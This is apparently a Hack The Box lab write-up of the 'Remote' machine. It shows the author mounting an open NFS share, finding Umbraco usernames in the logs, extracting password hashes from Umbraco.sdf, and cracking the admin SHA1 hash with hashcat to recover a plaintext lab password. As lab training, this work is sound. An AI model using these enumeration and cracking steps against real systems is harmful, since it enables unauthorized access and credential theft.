NFS
Nmap discovered a Network File System server on the target port 2049
The NFS server is also bound and mapped through the RPC service on the port 111
┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ showmount -e $IP
export list for 10.10.10.180:
/site_backups (everyone)The /site_backups directory is the NFS share available for mounting
Mounting
┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ sudo mkdir -p /mnt/remote
┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ sudo mount -t nfs $IP:/site_backups /mnt/remoteI created a temporary directory to mount the NFS share, then proceeded to mount the remote NFS share to the /mnt/remote/ directory on Kali
site_backups
┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ ll /mnt/remote
total 123K
4.0k drwxr-xr-x 3 root root 4.0k feb 1 11:50 ..
4.0K drwx------ 2 nobody nogroup 4.0K Feb 23 2020 .
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20 2020 App_Data
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20 2020 Views
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20 2020 Umbraco_Client
8.0K drwx------ 2 nobody nogroup 8.0K Feb 20 2020 Umbraco
512 drwx------ 2 nobody nogroup 64 Feb 20 2020 scripts
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20 2020 Media
8.0K drwx------ 2 nobody nogroup 8.0K Feb 20 2020 Config
512 drwx------ 2 nobody nogroup 64 Feb 20 2020 css
48K drwx------ 2 nobody nogroup 48K Feb 20 2020 bin
512 drwx------ 2 nobody nogroup 64 Feb 20 2020 aspnet_client
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20 2020 App_Plugins
512 drwx------ 2 nobody nogroup 64 Feb 20 2020 App_Browsers
28K -rwx------ 1 nobody nogroup 28K Feb 20 2020 Web.config
512 -rwx------ 1 nobody nogroup 152 Nov 1 2018 default.aspx
512 -rwx------ 1 nobody nogroup 89 Nov 1 2018 Global.asaxthe directory appears to be an installation of umbraco instance.
Given the fact that it’s named, site_backups, it is likely the backup of the web server running on the port 80
logs
┌──(kali㉿kali)-[/mnt/remote/App_Data/Logs]
└─$ ll
total 968K
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20 2020 ..
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20 2020 .
12K -rwx------ 1 nobody nogroup 12K Feb 20 2020 UmbracoTraceLog.remote.txt
768K -rwx------ 1 nobody nogroup 768K Feb 20 2020 UmbracoTraceLog.intranet.txt
180K -rwx------ 1 nobody nogroup 180K Feb 20 2020 UmbracoTraceLog.intranet.txt.2020-02-19
┌──(kali㉿kali)-[/mnt/remote/App_Data/Logs]
└─$ cat UmbracoTraceLog.remote.txt | grep -i user
2020-02-20 02:38:18,746 [P4392/D2/T10] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
2020-02-20 02:38:18,746 [P4392/D2/T10] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: User: admin@htb.local logged in from IP address 192.168.195.1
2020-02-20 02:38:22,787 [P4392/D2/T10] INFO Umbraco.Web.Editors.AuthenticationController - User admin@htb.local from IP address 192.168.195.1 has logged out
2020-02-20 02:38:57,527 [P4392/D2/T30] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.137
2020-02-20 02:38:57,527 [P4392/D2/T30] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: User: admin@htb.local logged in from IP address 192.168.195.137I found a log directory located at /site_backups/App_Data/Logs
One of the files mentions a username, admin, as well as a domain, htb.local
┌──(kali㉿kali)-[/mnt/remote/App_Data/Logs]
└─$ cat UmbracoTraceLog.intranet.txt | grep -i user
[...REDACTED...]
2020-02-20 00:39:00,708 [P5428/D2/T14] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username ssmith@htb.local from IP address 192.168.195.1
[...REDACTED...]Another file mentions another username, ssmith.
Umbraco.sdf
┌──(kali㉿kali)-[/mnt/remote/App_Data]
└─$ ll
total 2.0M
4.0K drwx------ 2 nobody nogroup 4.0K Feb 23 2020 ..
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20 2020 .
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20 2020 TEMP
512 drwx------ 2 nobody nogroup 64 Feb 20 2020 packages
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20 2020 Models
4.0K drwx------ 2 nobody nogroup 4.0K Feb 20 2020 Logs
512 drwx------ 2 nobody nogroup 64 Feb 20 2020 cache
36K -rwx------ 1 nobody nogroup 36K Feb 20 2020 umbraco.config
1.9M -rwx------ 1 nobody nogroup 1.9M Feb 20 2020 Umbraco.sdfI also found the Umbraco.sdf file.
the umbraco.sdf file is the sql ce file that Umbraco CMS stores the default DB information for development environment.
It is possible that the file may contain credentials that were used during the installation and initial development
SDF stands for Standard Database Format. It’s common to use a SDF file as a database during the development and switch over to a more robust database management system, such as Microsoft SQL Server, MySQL, or PostgreSQL.
admin
┌──(kali㉿kali)-[/mnt/remote/App_Data]
└─$ strings Umbraco.sdf | grep -i admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
[...REDACTED...]Upon checking for the string, admin, I found what appears to be a credential hash for the admin user
The password is hashed with the SHA1 algorithm,b8be16afba8c314ad33d812f22a04991b90e2aaa
ssmith
┌──(kali㉿kali)-[/mnt/remote/App_Data]
└─$ strings Umbraco.sdf | grep -i ssmith
ssmithsmith@htb.localjxduccruzn8rsrlqnfmvqw==aikyyl6fyy29ka3htb/eriyjuadpttfetpnik9cihts={"hashalgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xxicbpe7m5nq22hfcglg==rf9olinww9rd2pmakuplter6vesd2mtfabke1zl5sxa={"hashalgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
[...REDACTED...]I also found the password hashes for the ssmith user.
There are 2 and those appear to be have been encoded using Base64 and hashed using HMAC-SHA256 as noted.
However, I was unable to identify what exactly those strings are.
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ hashcat -a 0 -m 100 admin.hash /usr/share/wordlists/rockyou.txt
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 100 (SHA1)
Hash.Target......: b8be16afba8c314ad33d812f22a04991b90e2aaa
Time.Started.....: Wed Feb 1 15:02:21 2023 (4 secs)
Time.Estimated...: Wed Feb 1 15:02:25 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2669.5 kH/s (0.07ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 9824256/14344385 (68.49%)
Rejected.........: 0/9824256 (0.00%)
Restore.Point....: 9823488/14344385 (68.48%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: bad23girl -> bacninh_kc
Hardware.Mon.#1..: Util:100%
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => Started: Wed Feb 1 15:02:07 2023
Stopped: Wed Feb 1 15:02:27 2023Hashcat cracked the password hash
Web Credential extracted for the admin user; baconandcheese
Unmounting
┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ sudo umount /mnt/remoteI made sure to unmount the NFS share since I am done with it for now.